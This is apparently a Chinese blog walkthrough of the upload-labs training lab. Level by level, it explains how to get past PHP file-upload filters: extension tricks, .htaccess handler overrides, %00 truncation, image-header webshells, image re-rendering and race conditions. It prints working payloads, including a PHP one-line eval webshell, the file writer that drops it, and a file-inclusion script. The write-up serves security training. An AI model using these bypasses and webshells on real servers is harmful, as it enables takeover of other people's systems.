upload-labs通关集
upload-labs通关集
环境
windows,phpstudy,PHP版本5.2.17

第一题 前端js检查
上传小马,出现
查看源码
这里是通过前端js检查
我们可以先将文件后缀改为.jpg
然后用bp抓包,在将.jpg改为.php
这里也可以禁用js
第二题 content-type类型绕过
查看源码
发现只检查content-type,于是将content-type改为image/.jpg绕过

第三题 黑名单绕过
查看源码
可以看到代码使用黑名单来过滤
这里可以上传后缀为php3,pht,phtml,php5,phps等来绕过(它们会被解析为php)
前提是apache的httpd.conf中有如下配置代码
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
其他语言也有类似的情况,改后缀名上传即可:

由于我这里使用的是phpstudy+windows,由于配置原因是解析不了php3等等这些后缀的
第四题 .htaccess绕过
查看源码还是黑名单
几乎过滤了所有有问题的后缀名,除了.htaccess(apache的配置文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。),于是
先上传一个.htaccess内容如下的文件:
<FilesMatch "2.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
.htaccess文件的内容的意思是 对2.jpg使用php重新解析
然后再上传jpg的图片马,
也可以
SetHandler application/x-httpd-php
它会把所有上传文件当成php来解析
注意
启用.htaccess,需要修改httpd.conf,启用AllowOverride(将该值改为all)
连接

第五题 大小写绕过
查看源码
所有的都被过滤
但是可以发现,本题去掉了大小写绕过的逃逸。
直接上传.PHp。。
第六题 空格绕过
对比第五题的源码可以发现,本题源码少了
那么我们可以上传PHP文件,然后使用burp suit抓包修改后缀名格式为php加空格绕过。

第七题 点绕过
查看源码发现少了
可以在后缀中加点绕过

第八题 ::$DATA绕过
查看源码,少了

在php+windows的情况下:如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。
可在后缀名中加” ::$DATA”绕过:
然后能够直接访问成功即可

第九题 只过滤了一次且对后缀没有重命名的绕过
从源代码可以看出前几题的绕过方式全部被修复了。
程序先是去除文件名前后的空格,再去除文件名最后所有的点, 再通过strrchar来寻找.来确认文件名的后缀,但是最后保存文件的时候没有重命名而是使用处理后的文件名(红线的那一行表示路径拼接的是处理后的文件名)
可以利用4.php. .(两个点号之间有一个空格)绕过,
(也就是这个上传只过滤一次关键字。)

第十题 双写绕过
将非法后缀替换为空
于是可以利用双写绕过:
直接将后缀改为.pphphp上传。。
上传之后会变成.php
第十一题 get型%00截断
这一题并没有对我们上传的文件进行处理,但会对我们保存的路径进行处理,也就是我们上传后的文件名会被重命名
又发现有一个get传递的参数,save_path,这是我们可控的一个参数,于是可以尝试%00截断
使用%00截断,需要两个条件
(1)php版本小于5.3.4
(2)php的magic_quotes_gpc为OFF状态

上传一个7.jpg抓包在令save_path=…/upload/7.php%00
这里可能是其它配置原因报错了。。
后来又试了一下在phpstudy-其他选项-php扩展即设置-参数开关设置-把magic_quotes_gpc关了
突然发现可以上传了

第十二题 post型%00截断
发现只是get变成了post,还是利用00截断,但这次需要在二进制中进行修改,因为post不会像get对%00进行自动解码。
先在upload/后面加8.php+
然后找到加号对应的二进制
成功上传

第十三题 文件头检查
这里主要是取上传文件的头两个字节判断文件类型,因此直接上传图片马即可,制作方法:
copy 1.jpg /b + 1.php /a 2.jpg
然后上传
之后可以通过文件包含漏洞来利用
比如我们可以upload目录下写一个include.php文件
<?php
$file = $_GET[ 'page' ];
include($file);
?>
能正常访问即可(图片中隐藏的一句话木马此时已经运行)
包含这个页面后,会看到很多乱码,这些都是jpg文件的内容,当然在页面上是看不到一句话木马的语句的,因为已经被解析为php代码在后端运行的,不会显示在页面上。
然后就可以使用菜刀来连接木马
第十四题 突破getimagesize
这里用getimagesize获取文件类型,还是直接就可以利用图片马就可进行绕过:
getimagesize知识点
array getimagesize ( string KaTeX parse error: Expected 'EOF', got '&' at position 19: …ename [, array &̲imageinfo ] )
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串。
如果不能访问 filename 指定的图像或者其不是有效的图像,getimagesize() 将返回 FALSE 并产生一条 E_WARNING 级的错误。
因此$info[2]指的是文件的类型
这里我是添加GIF图片的文件头GIF89a,绕过GIF图片检查。
先上传22.php在加GIF98a

第十五题 突破exif_imagetype
这里用到php_exif模块来判断文件类型,还是直接就可以利用图片马就可进行绕过:
出现报错
解决办法打开php_exif
(1).phpstudy-其他选项-php扩展即设置-php扩展-打开php_exif
(2).如下
1.在php.ini文件中找到;extension=php_exif.dll,去掉前面的分号
2.在php.ini文件中找到;extension=php_mbstring.dll,去掉前面的分号,并将此行移动到extension=php_exif.dll之前,使之首先加载*。
3.找到[exif]段,把下面语句的分号去掉。
;exif.encode_unicode = ISO-8859-15
;exif.decode_unicode_motorola = UCS-2BE
;exif.decode_unicode_intel = UCS-2LE
;exif.encode_jis =
;exif.decode_jis_motorola = JIS
;exif.decode_jis_intel = JIS
重启php
之后就可以成功上传了

第十六题 二次渲染绕过
imagecreatefrom 系列函数用于从文件或 URL 载入一幅图像,成功返回图像资源,失败则返回一个空字符串。 该系列函数有: imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像
imagecreatefromjpeg():创建一块画布,并从 JPEG 文件或 URL 地址载入一副图像
imagecreatefrompng():创建一块画布,并从 PNG 文件或 URL 地址载入一副图像
imagecreatefromwbmp():创建一块画布,并从 WBMP 文件或 URL 地址载入一副图像
imagecreatefromstring():创建一块画布,并从字符串中的图像流新建一副图像
fileext和fileext和fileext和filetype是检验是否为gif格式.
然后使用move_uploaded_file()函数来做判断条件,如果成功会将文件移动到$target_path
这里的二次渲染是根据上传的图片生成一个新的图片,然后删除掉原来的图片。
将一句话添加到gif图片的尾部.
把上传后的图片下载到本地后可以发现,我们在gif末端添加的php代码已经被去除.
关于绕过gif的二次渲染,我们只需要找到渲染前后没有变化的位置,然后将php代码写进去,就可以成功上传带有php代码的图片了.
经过对比,蓝色部分是没有发生变化的,
将代码插入到这一段
上传
在查看上传后生成的7665.gif,这里可以看到PHP代码没有被删除,上传成功
详细参考https://xz.aliyun.com/t/2657#toc-18
第十七题 条件竞争
这里是先将文件上传到服务器,然后检测后缀,符合则通过rename修改名称,再通过unlink删除文件,否则直接删除,因此可以通过条件竞争的方式在unlink之前,访问webshell。
这里我是上传一个PHP文件,内容为
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>
这个可以在我们访问到webshell时在上传目录生成一个带一句话的shell.php
首先在burp中不断发送上传webshell的数据包:
抓包后放入intruder模块中选择发送多次
然后不断在浏览器中访问,会有一瞬间访问成功
这时就会发现upload文件夹下生成了shell.php文件,然后就可以利用了。
第十八题 条件竞争
尝试很久无果后,看了一下其它解题文章
本关对文件后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否存在等等
这里move()在renamefile()前面,也就是先移动到临时目录再重命名,所以同样存在条件竞争漏洞。
条件竞争的绕过和上题差不多,可以不断利用burp发送上传图片马的数据包,由于条件竞争,程序会出现来不及rename的问题,就可以上传成功了
后来发现这题也可以直接上传图片马。。
第十九题 %00截断
也是一个00截断绕过方法于pass12相同
查看源码
发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过:
上传
抓包后修改

upload-labs通关集的更多相关文章
- SUCTF 2019 Upload labs 2 踩坑记录
SUCTF 2019 Upload labs 2 踩坑记录 题目地址 : https://github.com/team-su/SUCTF-2019/tree/master/Web/Upload La ...
- Upload - Labs (下)
Pass - 11: 1.查看源代码,发现进行了一次对后缀名替换成空格,因此考虑双写绕过, 2.上传成功, 关键代码: $is_upload = false; $msg = null; if (iss ...
- Upload - Labs (上)
Pass - 01: 1.尝试上传一个php文件:aaa.php,发现只允许上传某些图片类型,用bp抓包,发现http请求都没通过burp就弹出了不允许上传的提示框,这表明验证点在前端,而不在服务端 ...
- Docker中自动化搭建Hadoop2.6完全分布式集群
这一节将在<Dockerfile完成Hadoop2.6的伪分布式搭建>的基础上搭建一个完全分布式的Hadoop集群. 1. 搭建集群中需要用到的文件 [root@centos-docker ...
- Upload-labs通关指南(上) 1-10
Upload-labs 所有文章和随笔(随笔将不于csdn更新)将于我的个人博客(移动端暂未适配)第一时间更新. 一些网站存在文件上传接口,一旦存在这个接口就有可能存在漏洞. 文件上传漏洞的逻辑是将一 ...
- buu学习记录(上)
前言:菜鸡误入buu,差点被打吐.不过学到了好多东西. 题目名称: (1)随便注 (2)高明的黑客 (3)CheckIn (4)Hack World (5)SSRF Me (6)piapiapia ( ...
- [web安全原理分析]-文件上传漏洞基础
简介 前端JS过滤绕过 待更新... 文件名过滤绕过 待更新 Content-type过滤绕过 Content-Type用于定义网络文件的类型和网页编码,用来告诉文件接收方以什么形式.什么编码读取这个 ...
- [原题复现+审计][SUCTF 2019] WEB CheckIn(上传绕过、.user.ini)
简介 原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn 考察知识点:上传绕过..user.ini 线上平台:h ...
- DVWA File Upload 通关教程
File Upload,即文件上传.文件上传漏洞通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁 ...
随机推荐
- 对话|人工智能先驱Yoshua Bengio
Bengio"> 今年1月份,微软收购深度学习初创公司Maluuba时,Maluuba公司德高望重的顾问.深度学习先驱Yoshua Bengio也接手了微软的人工智能研究顾问 ...
- OpenCV使用:加载图片时报错 0x00007FFC1084A839 处(位于 test1.exe 中)有未经处理的异常: Microsoft C++ 异常: cv::Exception,位于内存位置 0x00000026ABAFF1A8 处。
加载图片代码为: #include<iostream> #include <opencv2/core/core.hpp> #include <opencv2/highgu ...
- powershell加KeePass实现,加密服务器密码清单文件
powershell加KeePass实现,加密服务器清单文件 powershell传教士翻译,改写. 2020-02-27 原文: https://www.altaro.com/msp-doj ...
- python xlwings Excel 内容截图
import xlwings as xw from PIL import ImageGrab def excel_save_img(path, sheet=0, img_name="1&qu ...
- win10环境下VS2019配置NTL库
win10环境下VS2019配置NTL库 1.下载 WINNTL库文件 https://www.shoup.net/ntl/download.html 2.创建静态库 文件->新建-&g ...
- 【Geek议题】当年那些风骚的跨域操作
前言 现在cross-origin resource sharing(跨域资源共享,下简称CORS)已经十分普及,算上IE8的不标准兼容(XDomainRequest),各大浏览器基本都已支持,当年为 ...
- 前端AES加密解密
最开始使用的aes-js的npm包,后来发现npm上面那个包只能加密16个长度的字节,非16个长度的字符串就会报错,后来使用的是crypto-js, AES总共有四种加密方式,我们使用的CBC方式: ...
- call 和 apply 和 bind的区别
有些东西说忘就往,每天记录自己忘记的东西重新学习一遍,挺好 作用:call()和apply()用法都是一样的,改变this的指向问题 区别:接收参数的方式不同, (bind 方法是附加在函数调用后面使 ...
- Redis系列二 - 数据结构
前言 redis作为我们开发的一大神器,我们接触肯定不会少,但是很多同学也许只会存储String类型的值,这是非常不合理的.在这里,将带大家认识Redis的5中数据结构. 1.问:Redis有那些数据 ...
- Redux 架构理解
Redux 是一种前端“架构模式”,是 Flux 架构的一种变种,用来提供可预测的状态管理.虽然经常和 React 一起被提及,但是 Redux 却不仅仅只能用于 React,还可以将其运用到其他前端 ...